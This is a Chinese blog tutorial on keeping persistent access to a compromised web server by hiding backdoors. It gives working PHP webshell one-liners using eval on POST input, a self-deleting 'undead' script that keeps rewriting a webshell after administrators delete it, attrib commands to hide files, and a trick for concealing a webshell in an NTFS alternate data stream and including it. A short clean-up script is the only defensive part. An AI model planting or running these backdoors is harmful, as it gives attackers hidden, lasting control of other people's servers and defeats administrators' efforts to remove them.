美文网首页
维持权限之隐藏后门

维持权限之隐藏后门

作者: migrate_ | 来源:发表于2020-03-12 11:30 被阅读0次
  1. 隐藏后门文件
attrib +s +h 222.php //文件名
attrib +s +a +r +h 222.php //文件名
1.png

查看隐藏后的文件

dir /a:h
2.png
  1. 文件包含
    首先一个文件include.php,内容
<?php
 include("phpinfo".".jpg")
?>

在创建一个phpinfo.jpg,内容

<?php
 phpinfo(); 
?>
3.png

这个方法不能算隐藏文件,为了增强效果可以把文件名字起的比较像正常文件比如:

login.php
logout.php
email.class.php
upload_file.php

再不行就采用第一种方法把include.php隐藏起来,两种方法结合

  1. 不死马
    运行后,会删除自身,生成一个webshell.php,管理员删除后还会生成。
<?php  
    set_time_limit(0);  
    ignore_user_abort(1);  
    unlink(__FILE__);  
    while(1){  
        file_put_contents('webshell.php','<?php @eval($_POST["password"]);?>');  
        sleep(5);  
    }
4.png
解决不死马,覆盖重写,创建个clear.php或者重启服务再删除
<?php  
    set_time_limit(0);  
    ignore_user_abort(1);  
    unlink(__FILE__);  
    while(1){  
        file_put_contents('webshell.php','clear');  
        sleep(1);  
    }
5.png
  1. 利用ADS隐藏webshell
    在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

这样子就生成了一个不可见的shell,hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。
问题1:如何查看index.php:hidden.jpg内容呢?
进入文件所在目录

notepad index.php:hidden.jpg
或者
dir /r

问题2:如何删除index.php:hidden.jpg?
直接删除index.php即可


6.png

然后用一个正常文件里把这个ADS文件include进去

<?php include(‘index.php:hidden.jpg’)?>

这样子就可以正常解析我们的一句话了。


7.png

相关文章

  • 维持权限之隐藏后门

    隐藏后门文件 查看隐藏后的文件 文件包含首先一个文件include.php,内容 在创建一个phpinfo.jpg...

  • 权限维持 | SSH软链接后门

    01 后门命令 经典后门:对sshd建立软链接,即可使用任意密码登录。 1、创建后门 ln -sf /usr/sb...

  • 权限维持——牧马隐藏技巧

    本文仅作学习记录,如有侵权,请联系删除! 修改文件属性: Windows 使用attrib命令,参数说明如下: +...

  • 后渗透之权限维持

    前言 在getshell后,往往因为内网渗透的需要不得不长时间对目标进行持续威胁(简称APT)。因此需要进行权限维...

  • (转)一句话木马绕过WAF

    在渗透测试的后期,为了维持权限。我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门。但是事情...

  • OpenSSH后门

    当我们拿到一个服务器的shell之后,肯定需要维持好我们的权限,这里我们需要留个后门方便我们进出。这里我们不讨论提...

  • 【后渗透】权限维持之从隐藏账户到影子账户

    0x01 关于权限维持 很多时候,当我们获得到一个windows服务器的权限后,若某天服务器的管理员发现后修补了漏...

  • linux权限维持

    ssh软连接后门 SSH服务默认使用PAM进行身份验证 PAM是Linux系统中的一个独立API,它提供了各种验证...

  • Windows权限维持

    msf persistence模块 向目标主机的注册表添加键值,使后门程序开机自启 userinit注册表后门 U...

  • 记一次简单易上手的内网渗透实战

    我们大部分渗透操作都是从外网开始的,如果要获得更多的机器权限和维持权限,就必须掌握内获得更多的机器权限和维持权限,...

网友评论

      本文标题:维持权限之隐藏后门

      本文链接:https://www.haomeiwen.com/subject/fjdyjhtx.html